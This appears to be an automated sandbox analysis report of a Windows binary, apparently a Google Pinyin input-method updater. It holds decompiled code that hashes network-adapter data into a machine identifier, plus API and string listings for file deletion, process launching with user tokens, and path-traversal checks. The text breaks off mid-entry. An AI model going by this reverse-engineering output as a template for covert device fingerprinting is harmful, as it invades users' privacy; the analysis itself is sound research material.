                                                                                                                                                                    			E00463680(void* __ebp, intOrPtr _a4, char _a8, intOrPtr _a400, char _a10272, char _a10368, char _a10376, char _a10377, char _a10584, char _a10624, char _a10625, char _a10804, char _a10824, char _a10825, signed int _a11136, intOrPtr _a11140, signed int _a11144, void* _a11148, intOrPtr _a11164) {
                                                                                                                                                                    				char _v0;
                                                                                                                                                                    				void* _v16;
                                                                                                                                                                    				long* _v36;
                                                                                                                                                                    				void* _v40;
                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                    				char _v68;
                                                                                                                                                                    				intOrPtr _v76;
                                                                                                                                                                    				char _v88;
                                                                                                                                                                    				intOrPtr _v96;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                    				signed int _t51;
                                                                                                                                                                    				void* _t55;
                                                                                                                                                                    				void* _t63;
                                                                                                                                                                    				void* _t67;
                                                                                                                                                                    				long* _t68;
                                                                                                                                                                    				char* _t70;
                                                                                                                                                                    				intOrPtr _t71;
                                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                                    				void* _t79;
                                                                                                                                                                    				void* _t82;
                                                                                                                                                                    				signed int _t85;
                                                                                                                                                                    				void* _t102;
                                                                                                                                                                    				void* _t103;
                                                                                                                                                                    				char* _t104;
                                                                                                                                                                    				char* _t105;
                                                                                                                                                                    				void* _t106;
                                                                                                                                                                    				void* _t107;
                                                                                                                                                                    				void* _t109;
                                                                                                                                                                    				intOrPtr* _t110;
                                                                                                                                                                    				void* _t111;
                                                                                                                                                                    				signed int _t115;
                                                                                                                                                                    				signed int _t116;
                                                                                                                                                                    
                                                                                                                                                                    				L00504AA0(0x2b98);
                                                                                                                                                                    				_t49 =  *0x5596fc; // 0x9d48295
                                                                                                                                                                    				_a11144 = _t49 ^ _t115;
                                                                                                                                                                    				_t51 =  *0x5596fc; // 0x9d48295
                                                                                                                                                                    				 *[fs:0x0] =  &_a11148;
                                                                                                                                                                    				_t113 = _a11164;
                                                                                                                                                                    				_v0 = 0;
                                                                                                                                                                    				_a4 = _a11164;
                                                                                                                                                                    				_a10376 = 0;
                                                                                                                                                                    				_t55 = L004F3CE0( &_a10377, 0, 0xff);
                                                                                                                                                                    				_t116 = _t115 + 0xc;
                                                                                                                                                                    				_v0 = 0x2880;
                                                                                                                                                                    				__imp__GetAdaptersInfo( &_a8,  &_v0, _t51 ^ _t115, _t102, _t106, __ebp, _t79,  *[fs:0x0], 0x51658b, 0xffffffff);
                                                                                                                                                                    				if(_t55 != 0) {
                                                                                                                                                                    					L15:
                                                                                                                                                                    					_t97 =  *0x559000; // 0x521840
                                                                                                                                                                    					_t38 = _t97 + 0xc; // 0x4edeb4
                                                                                                                                                                    					_v0 =  *((intOrPtr*)( *_t38))() + 0x10;
                                                                                                                                                                    					_t85 =  &_a10368;
                                                                                                                                                                    					_a11148 = 0;
                                                                                                                                                                    					_t129 = _t85 & 0xffff0000;
                                                                                                                                                                    					if((_t85 & 0xffff0000) != 0) {
                                                                                                                                                                    						L004C7E30(_t113,  &_a10368);
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t97 = _t85;
                                                                                                                                                                    						_t108 = _t85 & 0x0000ffff;
                                                                                                                                                                    						_t63 = L00410DE0(_t129, _t85 & 0x0000ffff);
                                                                                                                                                                    						_t90 = _t63;
                                                                                                                                                                    						_t116 = _t116 + 4;
                                                                                                                                                                    						if(_t63 != 0) {
                                                                                                                                                                    							L00410F90(_t108, _t90, _t97, _t113);
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					 *[fs:0x0] = _a11140;
                                                                                                                                                                    					_pop(_t103);
                                                                                                                                                                    					_pop(_t107);
                                                                                                                                                                    					_pop(_t82);
                                                                                                                                                                    					return L004EEDC9(_t113, _t82, _a11136 ^ _t116, _t97, _t103, _t107);
                                                                                                                                                                    				}
                                                                                                                                                                    				_a10624 = 0;
                                                                                                                                                                    				_t67 = L004F3CE0( &_a10625, 0, 0xff);
                                                                                                                                                                    				_t116 = _t116 + 0xc;
                                                                                                                                                                    				_t109 = 0;
                                                                                                                                                                    				if(_a400 <= 0) {
                                                                                                                                                                    					L4:
                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                    					__imp__CryptAcquireContextW( &_v16, 0, L"Microsoft Base Cryptographic Provider v1.0", 1, 0xf0000000);
                                                                                                                                                                    					if(_t67 == 0) {
                                                                                                                                                                    						L13:
                                                                                                                                                                    						_t68 = _v36;
                                                                                                                                                                    						if(_t68 != 0) {
                                                                                                                                                                    							CryptReleaseContext(_t68, 0);
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L15;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t70 =  &_v40;
                                                                                                                                                                    					_v40 = 0;
                                                                                                                                                                    					__imp__CryptCreateHash(_v36, 0x8004, 0, 0, _t70);
                                                                                                                                                                    					if(_t70 == 0) {
                                                                                                                                                                    						L11:
                                                                                                                                                                    						_t71 = _v60;
                                                                                                                                                                    						if(_t71 != 0) {
                                                                                                                                                                    							__imp__CryptDestroyHash(_t71);
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L13;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t72 = _v60;
                                                                                                                                                                    					__imp__CryptHashData(_t72,  &_a10584, 0x100, 0);
                                                                                                                                                                    					if(_t72 == 0) {
                                                                                                                                                                    						goto L11;
                                                                                                                                                                    					}
                                                                                                                                                                    					_v68 = 0;
                                                                                                                                                                    					_a10824 = 0;
                                                                                                                                                                    					L004F3CE0( &_a10825, 0, 0xff);
                                                                                                                                                                    					_t110 = __imp__CryptGetHashParam;
                                                                                                                                                                    					_t116 = _t116 + 0xc;
                                                                                                                                                                    					_push(0);
                                                                                                                                                                    					_push( &_v68);
                                                                                                                                                                    					_push(0);
                                                                                                                                                                    					_push(2);
                                                                                                                                                                    					_push(_v76);
                                                                                                                                                                    					if( *_t110() == 0) {
                                                                                                                                                                    						goto L11;
                                                                                                                                                                    					}
                                                                                                                                                                    					_push(0);
                                                                                                                                                                    					_push( &_v88);
                                                                                                                                                                    					_push( &_a10804);
                                                                                                                                                                    					_push(2);
                                                                                                                                                                    					_push(_v96);
                                                                                                                                                                    					if( *_t110() != 0) {
                                                                                                                                                                    						_t111 = 0;
                                                                                                                                                                    						_t104 =  &_a10272;
                                                                                                                                                                    						do {
                                                                                                                                                                    							L004EFD15(_t104, "%02x",  *(_t116 + _t111 + 0x2aa8) & 0x000000ff);
                                                                                                                                                                    							_t111 = _t111 + 1;
                                                                                                                                                                    							_t116 = _t116 + 0xc;
                                                                                                                                                                    							_t104 = _t104 + 2;
                                                                                                                                                                    						} while (_t111 < 0x10);
                                                                                                                                                                    					}
                                                                                                                                                                    					goto L11;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t105 =  &_a10624;
                                                                                                                                                                    					do {
                                                                                                                                                                    						_t67 = L004EFD15(_t105, "%02x",  *(_t116 + _t109 + 0x1bc) & 0x000000ff);
                                                                                                                                                                    						_t109 = _t109 + 1;
                                                                                                                                                                    						_t116 = _t116 + 0xc;
                                                                                                                                                                    						_t105 = _t105 + 2;
                                                                                                                                                                    					} while (_t109 < _a400);
                                                                                                                                                                    					goto L4;
                                                                                                                                                                    				}
                                                                                                                                                                    			}






































                                                                                                                                                                    0x004637da
                                                                                                                                                                    0x004637de
                                                                                                                                                                    0x004637e5
                                                                                                                                                                    0x004637ee
                                                                                                                                                                    0x004637f4
                                                                                                                                                                    0x004637f7
                                                                                                                                                                    0x004637fc
                                                                                                                                                                    0x004637fd
                                                                                                                                                                    0x004637fe
                                                                                                                                                                    0x00463800
                                                                                                                                                                    0x00463805
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0046380b
                                                                                                                                                                    0x00463810
                                                                                                                                                                    0x00463818
                                                                                                                                                                    0x00463819
                                                                                                                                                                    0x0046381b
                                                                                                                                                                    0x00463820
                                                                                                                                                                    0x00463822
                                                                                                                                                                    0x00463824
                                                                                                                                                                    0x00463830
                                                                                                                                                                    0x0046383f
                                                                                                                                                                    0x00463844
                                                                                                                                                                    0x00463845
                                                                                                                                                                    0x00463848
                                                                                                                                                                    0x0046384b
                                                                                                                                                                    0x00463830
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00463735
                                                                                                                                                                    0x00463735
                                                                                                                                                                    0x00463740
                                                                                                                                                                    0x0046374f
                                                                                                                                                                    0x00463754
                                                                                                                                                                    0x00463755
                                                                                                                                                                    0x00463758
                                                                                                                                                                    0x0046375b
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00463740

APIs
• _memset.LIBCMT ref: 004636E5
• GetAdaptersInfo.IPHLPAPI ref: 004636FF
• _memset.LIBCMT ref: 00463722
• _sprintf.LIBCMT ref: 0046374F
• CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,?,?,?), ref: 0046377A
• CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,?,?), ref: 0046379D
• CryptHashData.ADVAPI32(?,?,00000100,00000000,?,?,?), ref: 004637BE
• _memset.LIBCMT ref: 004637E5
• CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,?,?,?,?), ref: 00463801
• CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,?,?,?,?,?), ref: 0046381C
• _sprintf.LIBCMT ref: 0046383F
• CryptDestroyHash.ADVAPI32(?,?,?,?), ref: 00463859
• CryptReleaseContext.ADVAPI32(?,00000000,?,?,?), ref: 00463869
Strings
Memory Dump Source
• Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
• Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
• Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
• Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
• Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
• Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
Similarity
• API ID: Crypt$Hash$_memset$ContextParam_sprintf$AcquireAdaptersCreateDataDestroyInfoRelease
• String ID: %02x$Microsoft Base Cryptographic Provider v1.0
• API String ID: 3915993297-960727614
• Opcode ID: 78ca891960ad1be52748c925b1fd2aa40e443ad424413b63f89a31f0fa0f0e14
• Instruction ID: 35ad0ab88f2c53b96e51b6da8a951032e0e975f107723094b7a2d27d6199717b
• Opcode Fuzzy Hash: 78ca891960ad1be52748c925b1fd2aa40e443ad424413b63f89a31f0fa0f0e14
• Instruction Fuzzy Hash: E55106B1608380AFD320DF558C85EABB7E8FF94705F00492EF58993241E7389A48C76B
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
• Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
• Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
• Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
• Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
• Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
Similarity
• API ID: _malloc
• String ID: ($,#S$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$vector<T> too long
• API String ID: 1579825452-572886045
• Opcode ID: 07d8f969e2a38024e499688d6c0d25fbd9c18093cfcbd5f25d975ce98705d55a
• Instruction ID: a6593d16d1c99220b1522e2bd9d4e2c8446d86178b8edc2c3394350344342a72
• Opcode Fuzzy Hash: 07d8f969e2a38024e499688d6c0d25fbd9c18093cfcbd5f25d975ce98705d55a
• Instruction Fuzzy Hash: 1282F9715083818FD734DF29C494BEBB7E5AF85304F144A2EE89A87381EB75A904CB97
Uniqueness

Uniqueness Score: -1.00%

APIs
• _memset.LIBCMT ref: 004133BA
• _memset.LIBCMT ref: 004133DA
• PathCombineW.SHLWAPI(?,00000000,00530660,?,?,?,00000000), ref: 004133F2
• FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00413405
• _memset.LIBCMT ref: 00413431
• PathCombineW.SHLWAPI(?,00000000,?,?,?,?,?,?,?,00000000), ref: 00413449
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0041351A
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00413529
• RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00413532
• MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,?,?,00000000), ref: 00413542
Strings
Memory Dump Source
• Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
• Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
• Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
• Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
• Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
• Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
Similarity
• API ID: FileFind_memset$CombinePath$CloseDirectoryFirstMoveNextRemove
• String ID: .
• API String ID: 3465664188-248832578
• Opcode ID: 7302526a160cd9a945124e8333b5f3fbcfb40a6226d9722e6c633cbbd5f7bb81
• Instruction ID: 22da61d63c616557a29c4e42a84aaf27dded663110294c704f54224831357acf
• Opcode Fuzzy Hash: 7302526a160cd9a945124e8333b5f3fbcfb40a6226d9722e6c633cbbd5f7bb81
• Instruction Fuzzy Hash: 3A5104711087419FD720DF24C849FDBB7E8AFA5714F004A1EF19983290EB399A48CB5A
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00405450: std::_Xinvalid_argument.LIBCPMT ref: 004054B0
                                                                                                                                                                      • Part of subcall function 00405450: _memmove.LIBCMT ref: 00405506
                                                                                                                                                                      • Part of subcall function 004051E0: _memmove.LIBCMT ref: 00405218
                                                                                                                                                                      • Part of subcall function 00406960: OutputDebugStringA.KERNEL32(?,00000002), ref: 004069EB
                                                                                                                                                                      • Part of subcall function 00406960: InitializeCriticalSection.KERNEL32(0055F654,00000002), ref: 00406A10
                                                                                                                                                                      • Part of subcall function 00406960: EnterCriticalSection.KERNEL32(0055F654,00000002), ref: 00406A21
                                                                                                                                                                      • Part of subcall function 00406960: _fprintf.LIBCMT ref: 00406A56
                                                                                                                                                                      • Part of subcall function 00406960: LeaveCriticalSection.KERNEL32(0055F654,?,?,?,?,00000000,?), ref: 00406A63
                                                                                                                                                                      • Part of subcall function 00406960: IsDebuggerPresent.KERNEL32(?), ref: 00406A81
                                                                                                                                                                      • Part of subcall function 00406960: DebugBreak.KERNEL32(?,?,?,?,?,00000000,?), ref: 00406A8B
                                                                                                                                                                      • Part of subcall function 00406960: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00406B8A
                                                                                                                                                                    • _memset.LIBCMT ref: 00416EF6
                                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00416FD3
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000000), ref: 00416FF6
                                                                                                                                                                    • _memset.LIBCMT ref: 004170AD
                                                                                                                                                                    • _memset.LIBCMT ref: 004170E1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection_memset$DebugFile_memmove$AttributesBreakCopyDebuggerEnterInitializeIos_base_dtorLeaveOutputPresentStringXinvalid_argument_fprintfstd::_std::ios_base::_
                                                                                                                                                                    • String ID: cache$custom_shuangpin_dict$customtoken$model$url.data$url.index$userdict
                                                                                                                                                                    • API String ID: 2342999473-1663332936
                                                                                                                                                                    • Opcode ID: 6472e58906d9a249097a67f24b660648f76ce65d2249715e7d8eb9cd2bfaf120
                                                                                                                                                                    • Instruction ID: b69ab5f7bbc1dba1c4094ae6297c87e0781fcdeaa2113a71fb652ede70e3bc34
                                                                                                                                                                    • Opcode Fuzzy Hash: 6472e58906d9a249097a67f24b660648f76ce65d2249715e7d8eb9cd2bfaf120
                                                                                                                                                                    • Instruction Fuzzy Hash: 0F72AFB19083818BD730DF65C845BDFB7E4AF95304F01892EE59D47282EB78A588CB97
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004DCD40: OpenMutexW.KERNEL32(00000001,00000000,00000000,?,00000000), ref: 004DCDBA
                                                                                                                                                                      • Part of subcall function 004DCD40: CloseHandle.KERNEL32(00000000), ref: 004DCE1B
                                                                                                                                                                      • Part of subcall function 004DD520: GetCurrentProcess.KERNEL32(000F01FF,?), ref: 004DD5B2
                                                                                                                                                                      • Part of subcall function 004DD520: OpenProcessToken.ADVAPI32(00000000), ref: 004DD5B9
                                                                                                                                                                      • Part of subcall function 004DD520: GetLastError.KERNEL32 ref: 004DD5C3
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004DC58B
                                                                                                                                                                    • _memset.LIBCMT ref: 004DC669
                                                                                                                                                                    • CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,0100040C,00000000,00000000,?,?), ref: 004DC6BD
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004DC6C7
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004DC6FF
                                                                                                                                                                    • AssignProcessToJobObject.KERNEL32 ref: 004DC71B
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004DC725
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004DC74F
                                                                                                                                                                    • SetThreadToken.ADVAPI32(?,?), ref: 004DC762
                                                                                                                                                                    • ResumeThread.KERNEL32(00000000), ref: 004DC77D
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004DC79C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle$Process$ErrorLast$OpenThreadToken$AssignCreateCurrentMutexObjectResumeUser_memset
                                                                                                                                                                    • String ID: D
                                                                                                                                                                    • API String ID: 989356616-2746444292
                                                                                                                                                                    • Opcode ID: 91691272c3cb846d031bda5c4689aebf72676aefbab257cca9383d32fd630f5b
                                                                                                                                                                    • Instruction ID: a95726b93a05b12c3c271d9a5d1fe934f67b75154c32a7106b59d11628e0756f
                                                                                                                                                                    • Opcode Fuzzy Hash: 91691272c3cb846d031bda5c4689aebf72676aefbab257cca9383d32fd630f5b
                                                                                                                                                                    • Instruction Fuzzy Hash: C3816E756043829BC720DF25D895B9BB7E4BF99304F108D2EE98997341EB38A809CB56
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000), ref: 004C24F3
                                                                                                                                                                    • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,09D48295), ref: 004C2514
                                                                                                                                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 004C2524
                                                                                                                                                                    • CryptHashData.ADVAPI32(09D48295,-00000010,-00000020,00000000), ref: 004C2597
                                                                                                                                                                    • CryptDestroyHash.ADVAPI32(09D48295), ref: 004C25BA
                                                                                                                                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 004C25C7
                                                                                                                                                                    • CryptGetHashParam.ADVAPI32(09D48295,00000004,?,?,00000000), ref: 004C2624
                                                                                                                                                                    • CryptGetHashParam.ADVAPI32(09D48295,00000002,00000000,?,00000000), ref: 004C2648
                                                                                                                                                                    • CryptDestroyHash.ADVAPI32(09D48295), ref: 004C2659
                                                                                                                                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 004C2666
                                                                                                                                                                    • CryptDestroyHash.ADVAPI32(09D48295), ref: 004C268E
                                                                                                                                                                    Strings
                                                                                                                                                                    • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 004C24E7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Crypt$Hash$Context$DestroyRelease$Param$AcquireCreateData
                                                                                                                                                                    • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                    • API String ID: 2102843587-1948191093
                                                                                                                                                                    • Opcode ID: a72decc0f07cfe66725c86da2b0d280a267ad2d3782ad7cf18565250826d54e3
                                                                                                                                                                    • Instruction ID: 55800cfb181adee3e636bc1611f896c058c02d1491e975136ead6b3b2048e459
                                                                                                                                                                    • Opcode Fuzzy Hash: a72decc0f07cfe66725c86da2b0d280a267ad2d3782ad7cf18565250826d54e3
                                                                                                                                                                    • Instruction Fuzzy Hash: 86517A79204301EFD714CF24C995F6BB7E8FB98714F10891EF58597280EBB8E8498B65
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00453D20: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,09D48295), ref: 00453D9B
                                                                                                                                                                      • Part of subcall function 00453D20: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00453DA6
                                                                                                                                                                      • Part of subcall function 00456D70: RegCreateKeyExW.ADVAPI32 ref: 00456DB9
                                                                                                                                                                      • Part of subcall function 00456D70: lstrlenW.KERNEL32(00000000), ref: 00456DC8
                                                                                                                                                                      • Part of subcall function 00456D70: RegSetValueExW.ADVAPI32(00000000,?,00000000,00000001,00000000,00000000), ref: 00456DE3
                                                                                                                                                                      • Part of subcall function 00456D70: RegCloseKey.ADVAPI32(00000000,?,00000000,00000001,00000000,00000000), ref: 00456DEE
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,?), ref: 0043D43B
                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043D44B
                                                                                                                                                                      • Part of subcall function 00456D70: RegDeleteValueW.ADVAPI32(00000000,00000000), ref: 00456E04
                                                                                                                                                                      • Part of subcall function 00456D70: RegCloseKey.ADVAPI32(00000000), ref: 00456E0F
                                                                                                                                                                    • lstrlenW.KERNEL32(os=win_x64), ref: 0043D55A
                                                                                                                                                                    • lstrlenW.KERNEL32(os=win_x86), ref: 0043D5AF
                                                                                                                                                                    • Shell_NotifyIconW.SHELL32 ref: 0043D75A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Create$lstrlen$CloseEventValue$DeleteDirectoryExistsFileIconNotifyPathShell_
                                                                                                                                                                    • String ID: Software\Google\Google Pinyin 2\Autoupdate$https://tools.google.com/service/update$os=win_x64$os=win_x86$p1S$pinyin
                                                                                                                                                                    • API String ID: 1287719964-983949337
                                                                                                                                                                    • Opcode ID: 926f2bf4434666743253501a919ccf49d049f4acf7a8774bffed00e580ad96e6
                                                                                                                                                                    • Instruction ID: 8b8346eccc9c08b443b90bd1134fa2209dc20015e7054e72aab1e53b9cb8df87
                                                                                                                                                                    • Opcode Fuzzy Hash: 926f2bf4434666743253501a919ccf49d049f4acf7a8774bffed00e580ad96e6
                                                                                                                                                                    • Instruction Fuzzy Hash: C8D1C7B16083808BC730DF29C84175FB7E9FF99318F04492EF65997292D7389909CB5A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: /../$/..\$4TS$\../$\..\
                                                                                                                                                                    • API String ID: 0-3831562738
                                                                                                                                                                    • Opcode ID: 063c37f97bee0c4451c82402518107afff6692f7ea7115684b11374613f09d8d
                                                                                                                                                                    • Instruction ID: d8e0929ef53b50c17782bfb7de816cdc8e6bb73b8f1739818cee5c51d3bb9aac
                                                                                                                                                                    • Opcode Fuzzy Hash: 063c37f97bee0c4451c82402518107afff6692f7ea7115684b11374613f09d8d
                                                                                                                                                                    • Instruction Fuzzy Hash: 3BF129B19043509FD724CF24C8947EB77E1AF95305F04492EE9998B382E378EA09CB97
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 00410185
                                                                                                                                                                    • PathCombineW.SHLWAPI(?,09D48295,00530660,0052FD50,?,00000000), ref: 0041019B
                                                                                                                                                                    • _memset.LIBCMT ref: 004101BE
                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004101D6
                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 0041034D
                                                                                                                                                                    • FindNextFileW.KERNEL32(?,?), ref: 004103BA
                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0041046B
                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00410476
                                                                                                                                                                      • Part of subcall function 00406960: OutputDebugStringA.KERNEL32(?,00000002), ref: 004069EB
                                                                                                                                                                      • Part of subcall function 00406960: InitializeCriticalSection.KERNEL32(0055F654,00000002), ref: 00406A10
                                                                                                                                                                      • Part of subcall function 00406960: EnterCriticalSection.KERNEL32(0055F654,00000002), ref: 00406A21
                                                                                                                                                                      • Part of subcall function 00406960: _fprintf.LIBCMT ref: 00406A56
                                                                                                                                                                      • Part of subcall function 00406960: LeaveCriticalSection.KERNEL32(0055F654,?,?,?,?,00000000,?), ref: 00406A63
                                                                                                                                                                      • Part of subcall function 00406960: IsDebuggerPresent.KERNEL32(?), ref: 00406A81
                                                                                                                                                                      • Part of subcall function 00406960: DebugBreak.KERNEL32(?,?,?,?,?,00000000,?), ref: 00406A8B
                                                                                                                                                                      • Part of subcall function 00406960: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00406B8A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalFileFindSection$Debug_memset$BreakCloseCombineDebuggerDeleteDirectoryEnterFirstInitializeIos_base_dtorLeaveNextOutputPathPresentRemoveString_fprintfstd::ios_base::_
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4273346265-3916222277
                                                                                                                                                                    • Opcode ID: f245494bb09a459d9b83272d6c3edd38e3604adbe1b7a2ed1ddd2e79ab8b5a54
                                                                                                                                                                    • Instruction ID: c12446bc226bc37bc8438f998b68a51f342704d3d017e1a88e450e5ae5764bdf
                                                                                                                                                                    • Opcode Fuzzy Hash: f245494bb09a459d9b83272d6c3edd38e3604adbe1b7a2ed1ddd2e79ab8b5a54
                                                                                                                                                                    • Instruction Fuzzy Hash: B091F4B05087818FD330CF25D884BDBB7E4BF94315F144A1EE599872C1DBB89988CB96
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memmove
                                                                                                                                                                    • String ID: invalid bitset<N> position$vector<T> too long
                                                                                                                                                                    • API String ID: 4104443479-707209719
                                                                                                                                                                    • Opcode ID: d7c6ecfd7c38db9b44173bf9347e88f1b99ede48f4a8ef006e909d630f08e87f
